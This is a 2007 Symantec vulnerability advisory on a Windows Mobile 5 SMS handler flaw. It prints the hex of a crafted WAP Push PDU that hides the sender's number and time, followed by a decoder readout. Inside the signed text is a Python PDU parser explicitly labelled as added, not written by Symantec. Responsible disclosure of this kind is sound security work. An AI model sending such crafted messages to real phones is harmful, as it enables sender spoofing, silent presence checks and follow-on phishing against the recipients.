SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue Oct 17 2007 07:56PM
research symantec com
-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory

Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition SMS Handler Issue With Regard to Malformed WAP Push Messages Hiding Source
Author: Ollie Whitehouse / ollie_whitehouse (at) symantec (dot) com
Release Date: 17-10-2007
Application: Microsoft Windows Mobile 5 PocketPC
Platform: Windows
Severity: Information Disclosure
Vendor status: Vendor Reviewed
CVE Number: CVE-2007-5493
Reference: http://www.securityfocus.com/bid/26019

Overview:

Microsoft Windows Mobile 6 is the latest version of Microsoft's mobile operating system. Designed for small embedded devices, Windows Mobile is the CE feature set designed for PDAs and mobile telephones. Microsoft Windows Mobile comes in three distinct flavors: Pocket PC, Pocket PC Phone Edition and SmartPhone.

A vulnerability has been discovered in the SMS handler on Windows Mobile 2005 Pocket PC Phone Edition that allows the sender of the original SMS message to be masked from the recipient when a specially crafted WAP PUSH message is sent.

Details:

Symantec discovered that a slightly malformed WAP PUSH message could be used to hide the originating sender of the message on Windows Mobile 2005. The original PDU can be seen in [1]. The following PDU will cause the Pocket PC Phone Edition SMS handler to decode the PDU incorrectly, with the result that both the sending telephone number and the sending time are incorrect.

[1] PDU (Line wrapped)

079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101

The decode of the PDU can be seen in [2]. This decode was achieved with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message is received by a SmartPhone it will be silently discarded, which can also be useful to an attacker who wishes to ascertain if a cellphone is on without alerting the user through SMS delivery receipts.

[2] Decode of PDU from PDUSpy

PDU LENGTH IS 118 BYTES

ADDRESS OF DELIVERING SMSC
NUMBER IS : +447785016005
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)

MESSAGE HEADER FLAGS
MESSAGE TYPE : SMS SUBMIT
REJECT DUPLICATES : NO
VALIDITY PERIOD : RELATIVE
REPLY PATH : NO
USER DATA HEADER : PRESENT
REQ. STATUS REPORT : NO
MSG REFERENCE NR. : 34 (0x22)

DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163)

PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific

DATA CODING SCHEME (0x04)
AUTO-DELETION : OFF
COMPRESSION : OFF
MESSAGE CLASS : NONE
ALPHABET USED : 8bit data

VALIDITY OF MESSAGE : 24.0 hrs

USER DATA PART OF SM
USER DATA LENGTH : 96 octets
UDH LENGTH : 6 octets
UDH : 05 04 0B 84 23 F0
UDH ELEMENTS : 05 - Appl. port addressing 16bit
4 (0x04) Bytes Information Element
09200 : SOURCE port is: allocated by IANA
02948 : DESTINATION port is: allocated by IANA
--- DATA ----------------------
05 04 0B 84 23 F0
USER DATA (TEXT) : %®ê¯?´?jEÆ
symantec?Symantec
bulkSMS (Unregistered Ver) -
LogixMobile.com
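
The field layout behind the PDUSpy decode in [2], as an added example that is not part of the Symantec advisory: a small Python parser for the 8-bit SMS-SUBMIT PDU in [1] that recovers the same SMSC, destination and port values and flags the WAP Push destination port. The names parse_submit, semi_octets and WAP_PUSH_PORT are illustrative choices for this example.

```python
# Added example (not from the advisory): decode the SMS-SUBMIT PDU shown in [1].
PDU_HEX = (  # copied from [1] on this page
    "079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA"
    "AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62"
    "756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62"
    "696C652E636F6D000101"
)
WAP_PUSH_PORT = 2948  # IANA-registered "wap-push" port

def semi_octets(octets):
    """Swapped-nibble BCD digits, with the 0xF filler stripped."""
    return "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in octets).rstrip("F")

def parse_submit(pdu_hex):
    """Return the header fields of an 8-bit SMS-SUBMIT PDU as a dict."""
    raw = bytes.fromhex(pdu_hex)
    pos = 1 + raw[0]  # index of the first octet after the SMSC address
    out = {"length": len(raw), "smsc": semi_octets(raw[2:pos])}
    first, out["mr"], da_digits = raw[pos], raw[pos + 1], raw[pos + 2]
    if first & 0x03 != 0x01:
        raise ValueError("not an SMS-SUBMIT PDU")
    da_end = pos + 4 + (da_digits + 1) // 2  # +4: first octet, MR, length, TON/NPI
    out["dest"] = semi_octets(raw[pos + 4:da_end])
    out["pid"], out["dcs"] = raw[da_end], raw[da_end + 1]
    if out["dcs"] != 0x04:
        raise ValueError("example handles 8-bit data (DCS 0x04) only")
    vpf = (first >> 3) & 0x03  # 0 = no VP, 2 = relative (1 octet), 1 or 3 = 7 octets
    pos = da_end + 2 + {0: 0, 2: 1}.get(vpf, 7)
    out["udl"], ud = raw[pos], raw[pos + 1:]
    if len(ud) != out["udl"]:
        raise ValueError("user data length does not match TP-UDL")
    hdr_len = 1 + ud[0] if first & 0x40 else 0  # UDHI set: UDHL octet + elements
    i = 1
    while i + 2 <= hdr_len:  # walk the information elements in the UDH
        iei, ielen = ud[i], ud[i + 1]
        if iei == 0x05 and ielen == 4:  # application port addressing, 16 bit
            out["dst_port"] = int.from_bytes(ud[i + 2:i + 4], "big")
            out["src_port"] = int.from_bytes(ud[i + 4:i + 6], "big")
        i += 2 + ielen
    out["payload"] = ud[hdr_len:]
    out["wap_push"] = out.get("dst_port") == WAP_PUSH_PORT
    return out

if __name__ == "__main__":
    for key, value in parse_submit(PDU_HEX).items():
        print(f"{key:9}: {value}")
```

A SUBMIT PDU carries a destination address but no originating address or timestamp field; those fields exist only in the SMS-DELIVER form that the handset receives.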

Vendor Response:

A vulnerability has been discovered in the SMS handler. If a malicious message with no sender was received by a user on their device, the user may be enticed into taking action or clicking the URI that could lead to a second order attack.

Mitigating Factors: By default Windows mobile device policy requires SI messages to be authenticated. The Mobile Operators have the ability to change the policy to not requiring authentication in order for 3rd party ring tones and other SI messages.

Microsoft will look into a different architecture in future versions.

Recommendation:

Contact your mobile operator to ensure the proper policy is set on your device.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research (at) symantec (dot) com

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure (at) symantec (dot) com

For general information on Symantec's Product Vulnerability reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.

Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Consulting Services. Reprinting the whole or part of this alert in any medium other than electronically requires permission from research (at) symantec (dot) com.

Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are registered trademarks of Symantec Corp. and/or affiliated companies in the United States and other countries. All other registered and unregistered trademarks represented in this document are the sole property of their respective companies/owners.

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD

1qhcVHQ07YHEdgF0zUP81/k=

=pFeF

-----END PGP SIGNATURE-----
